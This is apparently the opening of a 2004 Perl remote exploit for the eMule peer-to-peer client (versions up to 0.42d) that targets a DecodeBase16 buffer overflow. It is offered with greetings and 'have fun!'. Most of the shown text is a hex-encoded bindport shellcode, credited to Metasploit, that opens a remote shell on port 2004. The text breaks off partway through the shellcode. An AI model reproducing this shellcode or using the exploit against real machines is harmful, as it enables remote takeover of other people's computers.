1 #!/usr/bin/perl
2 #
3 # eMule <= 0.42d Remote Exploit by kcope
4 #
5 # exploits the DecodeBase16 buffer overflow
6 # tested on WinXP SP1 / Win2k SP4
7 # bindport/connectback shellcode
8 #
9 # thanks Kostya Kortchinsky for his posting to bugtraq
10 #
11 # greetings to sander, blackzero, beginna, adize, A-cru and wY :p
12 # have fun!
13 #
14 # kcope, kingcope gmx net Apr 2004
15 #
16
17 use Socket;
18 use Getopt::Std;
19
20 # bindport shellcode (port 2004) thanks to metasploit
21 $sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x21\x39".
22 "\x11\x09\x83\xeb\xfc\xe2\xf4\xc9\x6f\x11\x09\x21\x6a\x44\x5f\x76".
23 "\xb2\x7d\x2d\x39\xb2\x54\x35\xaa\x6d\x14\x71\x20\xd3\x9a\x43\x39".
24 "\xb2\x4b\x29\x20\xd2\xf2\x3b\x68\xb2\x25\x82\x20\xd7\x20\xf6\xdd".
25 "\x08\xd1\xa5\x19\xd9\x65\x0e\xe0\xf6\x1c\x08\xe6\xd2\xe3\x32\x5d".
26 "\x1d\x05\x7c\xc0\xb2\x4b\x2d\x20\xd2\x77\x82\x2d\x72\x9a\x53\x3d".
27 "\x38\xfa\x82\x25\xb2\x10\xe1\xca\x3b\x20\xc9\x7e\x67\x4c\x52\xe3".
28 "\x31\x11\x57\x4b\x09\x48\x6d\xaa\x20\x9a\x52\x2d\xb2\x4a\x15\xaa".
29 "\x22\x9a\x52\x29\x6a\x79\x87\x6f\x37\xfd\xf6\xf7\xb0\xd6\x88\xcd".
30 "\x39\x10\x09\x21\x6e\x47\x5a\xa8\xdc\xf9\x2e\x21\x39\x11\x99\x20".
31 "\x39\x11\xbf\x38\x21\xf6\xad\x38\x49\xf8\xec\x68\xbf\x58\xad\x3b".
32 "\x49\xd6\xad\x8c\x17\xf8\xd0\x28\xcc\xbc\xc2\xcc\xc5\x2a\x5e\x72".
33 "\x0b\x4e\x3a\x13\x39\x4a\x84\x6a\x19\x40\xf6\xf6\xb0\xce\x80\xe2".
34 "\xb4\x64\x1d\x4b\x3e\x48\x58\x72\xc6\x25\x86\xde\x6c\x15\x50\xa8".
35 "\x3d\x9f\xeb\xd3\x12\x36\x5d\xde\x0e\xee\x5c\x11\x08\xd1\x59\x71".
36 "\x69\x41\x49\x71\x79\x41\xf6\x74\x15\x98\xce\x10\xe2\x42\x5a\x49".
37 "\x3b\x11\x0e\xf5\xb0\xf1\x63\x31\x69\x46\xf6\x74\x1d\x42\x5e\xde".
38 "\x6c\x39\x5a\x75\x6e\xee\x5c\x01\xb0\xd6\x61\x62\x74\x55\x09\xa8".
39 "\xda\x96\xf3\x10\xf9\x9c\x75\x05\x95\x7b\x1c\x78\xca\xba\x8e\xdb".
40 "\xba\xfd\x5d\xe7\x7d\x35\x19\x65\x5f\xd6\x4d\x05\x05\x10\x08\xa8".
41 "\x45\x35\x41\xa8\x45\x35\x45\xa8\x45\x35\x59\xac\x7d\x35\x19\x75".
42 "\x69\x40\x58\x70\x78\x40\x40\x70\x68\x42\x58\xde\x4c\x11\x61\x5